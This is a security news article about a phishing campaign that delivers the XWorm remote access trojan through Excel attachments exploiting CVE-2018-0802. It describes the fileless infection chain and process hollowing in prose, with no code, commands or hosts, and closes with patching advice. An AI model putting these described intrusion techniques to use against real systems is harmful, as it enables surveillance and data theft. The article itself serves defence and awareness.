A recent cyber-espionage campaign has emerged, utilizing the XWorm Remote Access Trojan (RAT) to infiltrate systems through meticulously designed phishing emails and exploiting a longstanding Microsoft Office vulnerability. Security experts are raising alarms about this operation, which underscores the ongoing threat posed by legacy software flaws in today’s digital landscape.
First detected in 2022, XWorm has gained notoriety in underground markets, including Telegram, where it is actively promoted. This formidable Windows malware provides attackers with comprehensive remote control over a victim’s computer, facilitating surveillance, data theft, and even enabling ransomware or distributed denial-of-service (DDoS) attacks.
The latest campaign initiates with business-oriented phishing emails, crafted in multiple languages. These messages masquerade as purchase orders, shipment confirmations, or payment notifications, enticing recipients to open an attached Excel add-in file to review purported details. However, this attachment is malicious, and opening it triggers a silent infection sequence.
Excel Exploit Starts Fileless Attack
The Excel document conceals a hidden Object Linking and Embedding (OLE) component, engineered to exploit CVE-2018-0802, a remote code execution vulnerability in Microsoft Equation Editor. Upon opening the file, the vulnerable program processes malformed data, executing embedded shellcode that downloads an HTML Application (HTA) file onto the system. This file is then executed using Windows utilities.
Subsequently, the HTA script launches PowerShell, which retrieves a disguised image file from the internet. Concealed within this image is a .NET malware module encoded in Base64. Rather than writing files to disk, this module loads directly into memory, complicating detection efforts. It then downloads the final XWorm payload, injecting it into a newly created Msbuild.exe process through a technique known as process hollowing, which replaces the legitimate program’s memory with malicious code while preserving the trusted process name.
The payload analyzed in this campaign corresponds to XWorm version 7.2.
Remote Control, Data Theft, and Plugins
Upon execution, XWorm establishes a connection with its command-and-control (C2) server, registering the infected device. The malware encrypts communications using AES, transmitting critical system details such as the username, operating system, hardware specifications, and antivirus software in use.
This enables attackers to issue commands to the compromised machine, with capabilities that include running applications, downloading files, opening websites, recording keystrokes, capturing screenshots, and even controlling the camera or microphone. Furthermore, the malware can restart or shut down the computer and execute system commands remotely.
A standout feature of XWorm is its plugin architecture, which allows for the integration of over 50 optional modules from the registry to enhance its functionality. These plugins facilitate credential theft, browser data harvesting, unauthorized remote desktop access, and the execution of DDoS attacks. In certain scenarios, attackers can also deploy ransomware from the same infection.
Researchers emphasize that this campaign highlights a persistent security challenge: organizations frequently neglect to patch outdated Office components. Despite the age of the Equation Editor vulnerability, it remains actively exploited due to the presence of the outdated executable in many systems. Security experts recommend disabling legacy Office components, applying necessary patches, and exercising caution with unexpected attachments. A single opened document can grant attackers complete control of a system within mere minutes.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
